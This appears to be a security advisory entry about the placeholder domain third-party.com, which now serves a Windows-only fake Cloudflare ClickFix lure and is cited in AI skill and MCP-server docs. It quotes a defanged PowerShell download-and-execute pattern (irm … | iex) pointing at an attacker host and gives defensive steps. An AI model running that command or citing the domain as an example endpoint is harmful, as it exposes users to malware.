malware
Published 2026-09-23
Verified 2026-09-27

third-party.com placeholder domain serves Windows ClickFix (Manifold 23 Sep); docs/MCP skills cite it like example.com

Manifold Security (23 September 2026; Ax Sharma) and BleepingComputer confirm that third-party.com — a long-used documentation placeholder that is not IANA-reserved like example.com — now serves a fake Cloudflare “Performing security verification” ClickFix lure to Windows user-agents only. Clicking the verify box stages a PowerShell clipboard payload (irm elxxvvx[.]xyz/f | iex pattern); Win+R → Ctrl+V → Enter runs it. macOS/Linux visitors get a decoy “OS not supported” page with no clipboard poison, which can fool non-Windows scanners and reputation feeds. Manifold traced the domain through public AI skill and MCP-server docs that cite it as an example endpoint; Chromium Telemetry Extension docs, W3C specs, and other repos also use it as a stand-in. Second-stage elxxvvx[.]xyz was offline at testing (Hybrid Analysis May 2026 showed a draw.io.exe zip chain). Primary: Manifold; wire: BleepingComputer.

Product
Windows endpoints; developer docs / AI skills / MCP examples citing third-party.com
Versions
n/a (living domain abuse; not a product CVE)
Exploited in Australia?
unknown
Patch to
Block/monitor third-party.com and elxxvvx[.]xyz; alert on Win+R + PowerShell irm/iex clipboard chains and fake Cloudflare verify UX; scrub third-party.com from internal docs/skills/MCP examples (use example.com / documentation-only hosts); train users never to paste CAPTCHA ‘verification’ commands into Run

Primary: Manifold Security — third-party.com placeholder ClickFix (23 Sep 2026) · Vendor: Manifold — third-party.com ClickFix research · BleepingComputer — placeholder domain ClickFix (23 Sep 2026)

tech australia identity